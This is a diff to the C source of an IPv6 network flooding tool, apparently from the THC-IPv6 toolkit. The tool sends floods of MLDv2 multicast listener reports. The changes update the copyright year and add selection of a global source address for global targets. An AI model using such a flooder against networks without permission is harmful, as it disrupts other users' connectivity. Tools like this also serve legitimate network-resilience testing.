@@ -13,7 +13,7 @@
 #define RECORD_NUMBER     8
 
 void help(char *prg) {
-  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2014 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s interface [target]\n\n", prg);
   printf("Flood the local network with MLDv2 reports.\n");
 //  printf("Use -r to use raw mode.\n\n");
@@ -25,7 +25,7 @@ int main(int argc, char *argv[]) {
   unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
   unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)];
   unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst);
-  int i, j;
+  int i, j, prefer = PREFER_LINK;
   unsigned char *pkt = NULL;
   int pkt_len = 0;
   int rawmode = 0;
@@ -49,11 +49,16 @@ int main(int argc, char *argv[]) {
     fprintf(stderr, "Error: invalid interface %s\n", interface);
     exit(-1);
   }
-  if (argc > 2)
+  if (argc > 2) {
     if ((dst = thc_resolve6(argv[2])) == NULL) {
       fprintf(stderr, "Error: can not resolve %s\n", argv[2]);
       exit(-1);
     }
+    if (dst[0] >= 0x20 && dst[0] <= 0xfd) {
+      prefer = PREFER_GLOBAL;
+      ip6 = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL);
+    }
+  }
 
   mac[0] = 0x00;
   mac[1] = 0x18;
